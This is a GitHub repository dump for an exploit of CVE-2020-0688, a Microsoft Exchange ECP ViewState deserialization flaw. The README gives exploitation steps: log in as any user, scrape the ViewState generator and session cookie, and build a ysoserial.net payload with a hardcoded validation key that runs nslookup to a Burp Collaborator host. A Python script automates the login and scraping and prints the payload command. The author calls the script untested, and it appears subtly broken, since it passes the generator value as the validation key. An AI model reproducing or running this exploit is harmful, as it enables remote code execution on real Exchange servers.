Repository: random-robbie/cve-2020-0688
Branch: master
Commit: d3d558144d3c
Files: 2
Total size: 2.7 KB
Directory structure:
gitextract__7wfsuof/
├── README.md
└── exploit.py
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# cve-2020-0688
cve-2020-0688
Log in as a user with an email address; privilege level is nothing to worry about.
Grab - `__VIEWSTATEGENERATOR` from page source
Grab - the value of `ASP.NET_SessionId` cookie for viewstateuserkey value
[Download YSO Here](https://github.com/pwntester/ysoserial.net/releases/download/v1.32/ysoserial-1.32.zip)
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```
Send a GET request to:
```
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
```
exploit.py is untested and needs a demo system to fire up and play with.
================================================
FILE: exploit.py
================================================
#
# THIS WILL NOT WORK IT NEEDS WORK
#
#
# This is a mock-up of an exploit flow. I need a system I can test this on to make it work, but here is the base code to get somewhere.
#
# By Random_Robbie
#
#
import requests
import argparse
import re
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="ECP Server")
parser.add_argument("-u", "--user", required=True, help="Email Address")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()
owa_login_form_url = args.server
user_name = args.user
pwd = args.password
session = requests.Session()
paramsPost = {"password":""+pwd+"","isUtf8":"1","passwordText":"","trusted":"4","destination":""+owa_login_form_url+"","flags":"4","forcedownlevel":"0","username":""+user_name+""}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"PBack":"0","PrivateComputer":"true"}
response = session.post(""+owa_login_form_url+"auth.owa", data=paramsPost, headers=headers, cookies=cookies)
print("Status code: %i" % response.status_code)
if "reason=2" in response.text:
    print ("Login Incorrect")
else:
    VIEWSTATEGENERATOR = re.compile('id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(response.text))[0]
    viewstateuserkey = re.compile('ASP.NET_SessionId=(.+?) Time').findall(str(response.headers))[0]
    print("""ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="""+VIEWSTATEGENERATOR+""" --generator="B97B4E27" --viewstateuserkey="""+viewstateuserkey+""" --isdebug –islegacy""")